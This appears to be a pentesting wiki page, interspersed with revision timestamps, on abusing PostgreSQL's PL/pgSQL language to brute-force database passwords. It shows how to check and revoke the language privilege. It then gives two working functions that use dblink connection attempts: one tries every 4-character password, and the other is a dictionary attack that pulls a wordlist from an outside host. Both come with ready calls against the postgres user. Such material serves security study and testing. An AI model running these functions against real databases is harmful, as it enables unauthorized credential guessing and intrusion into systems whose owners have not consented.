2020-07-15 15:43:14 +00:00
# PL/pgSQL Password Bruteforce
2021-11-30 13:50:20 +00:00
PL/pgSQL, as a **fully featured programming language** , allows much more procedural control than SQL, including the **ability to use loops and other control structures** . SQL statements and triggers can call functions created in the PL/pgSQL language.
2020-07-15 15:43:14 +00:00
You can abuse this language in order to ask PostgreSQL to brute-force the users credentials, but it must exist on the database. You can verify it's existence using:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |
```
2021-11-30 13:50:20 +00:00
By default, **creating functions is a privilege granted to PUBLIC** , where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:
2020-07-15 15:43:14 +00:00
```sql
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
```
In that case, our previous query would output different results:
```sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}
```
Here how you could perform a 4 chars password bruteforce:
```sql
//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';
//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
_Note that even brute-forcing 4 characters may take several minutes._
2021-10-18 11:21:18 +00:00
You could also **download a wordlist** and try only those passwords (dictionary attack):
2020-07-15 15:43:14 +00:00
```sql
//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'
//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
```
2021-11-30 13:50:20 +00:00
**Find**[ **more information about this attack in this paper** ](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.**
